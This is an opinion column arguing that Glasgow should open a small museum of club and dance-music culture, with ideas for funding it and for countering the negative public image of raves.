Column: Scotland’s Sound

With another exhibition about the rise of techno music opening in London next month, we should be asking where the Glasgow exhibitions are. Glasgow has long been proclaimed as one of the greatest cities in the world for dance music. It is argued that for the size of the city, its influence and institutions are far and world reaching.

This view may be seen through Clyde-tinted glasses. It is far easier to see the reach of labels such as Soma and Dixon Avenue Basement Jams when they are from where you live. I do not doubt the importance and quality of these labels; they are excellent outputs we should be thankful for.

For Glasgow to cement its position in the world, it could take an easy and influential route. For some, dance and club culture is all about having fun, and that is all. There is nothing wrong with this; dance music by nature is about, not-surprisingly, dancing, socialising and good times. But for many it is much more than this. It is of mass cultural importance, has a legacy, a history and a future.

The Sub Hub provided a place to show a more serious side to club culture. Hosting lectures, talks, workshops and exhibitions; it helped show that club culture is to be taken more seriously than many currently treat it.

A museum of club culture would be perfect in Glasgow. We are a city with a huge student base, full of young creative types who help fuel the scene and the city artistically. It would help build tourism, generate a bigger buzz around the city and the labels, producers, club owners, promoters, DJs and basically everyone who takes their clubbing and dance music a bit more seriously than going to Jelly Baby on a Thursday.

Some friends have raised queries about funding when I have spoken of the idea. The museum needn’t be huge; a small one gallery studio or something similar is still larger than nothing at all. Money could be raised through pre-parties if a licensed bar was acquired. A shop selling tickets to events for a small booking fee, equipment, and lectures held at a small fee would all help to subsidise the venue.

There is still a largely negative relationship held between club culture and society. This is a topic for wider discussion. A museum that exhibits, documents, debates and explains elements of dance and club culture can help to break down negative imagery of raves and events held by many in government and in the media. With events and clubs constantly under threat from unfair licensing decisions and police restrictions, this is an important and necessary step.

If Glasgow really wants to boast of a top spot in the clubbing world, it needs to lead the way outside of just musical content. A museum would not only provide a boost for the local economy, it would inform and enlighten many in a subject matter that is treasured by myself and many in the wider community.
